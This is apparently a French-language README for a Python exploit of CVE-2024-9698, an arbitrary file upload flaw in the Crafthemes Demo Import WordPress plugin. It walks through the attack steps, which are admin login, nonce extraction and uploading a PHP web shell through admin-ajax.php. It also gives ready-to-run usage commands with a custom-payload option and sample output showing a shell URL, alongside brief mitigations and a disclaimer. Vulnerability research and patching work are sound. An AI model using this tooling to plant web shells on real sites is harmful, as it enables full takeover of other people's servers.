CVE-2024-9698
Crafthemes Demo Import <= 3.3 - Exploit de téléversement arbitraire de fichiers
📌 Vue d'ensemble
Cet exploit cible une vulnérabilité critique (CVE-2024-9698) dans le plugin Crafthemes Demo Import pour WordPress. La vulnérabilité permet aux administrateurs authentifiés de téléverser des fichiers arbitraires sur le site WordPress concerné, ce qui peut conduire à une exécution de code à distance (RCE).
🔍 Détails de la vulnérabilité
- Plugin : Crafthemes Demo Import
- Versions affectées : ≤ 3.3
- Identifiant CVE : CVE-2024-9698
- Sévérité : Élevée (Score CVSS : 7.2)
- Fonction vulnérable :
process_uploaded_files
- Problème : Le plugin ne dispose pas d'une validation appropriée des types de fichiers, ce qui permet aux administrateurs de téléverser des fichiers PHP malveillants sur le serveur.
- Impact potentiel : Les attaquants peuvent obtenir un contrôle total sur le site Web en exécutant des commandes arbitraires.
🎯 Exploitation
✅ Prérequis
- Des identifiants d'administrateur WordPress sont requis pour exploiter cette vulnérabilité.
- Vérification de la vulnérabilité : Le script commence par vérifier la version du plugin en extrayant les informations de
readme.txt.
- Connexion à WordPress : S'authentifie en tant qu'administrateur et récupère les cookies de session.
- Extraction du jeton nonce : Analyse le jeton nonce requis pour les requêtes AJAX.
- Téléversement du fichier malveillant : Utilise
admin-ajax.php pour téléverser un shell PHP personnalisé.
- Vérification du téléversement : Confirme le succès du téléversement et affiche l'URL du shell.
🛠️ Utilisation
python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password"
📝 Payload personnalisé
Si vous souhaitez téléverser un payload PHP personnalisé, utilisez :
python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password" --payload "<?php phpinfo(); ?>"
🔥 Exemple de sortie
[+] Target is vulnerable, proceeding with exploit...
[+] Logged in successfully.
[+] Extracted nonce: abc123xyz
[+] Shell uploaded successfully: http://target.com/wp-content/uploads/2025/02/Nxploit.php
🛡️ Atténuation
- Mettez à jour le plugin vers une version corrigée si disponible.
- Restreignez l'accès administrateur aux utilisateurs de confiance.
- Surveillez et auditez les fichiers téléversés.
Avertissement : Ce script est destiné uniquement à des fins éducatives et de recherche en sécurité. Toute utilisation non autorisée contre des systèmes sans autorisation explicite est illégale.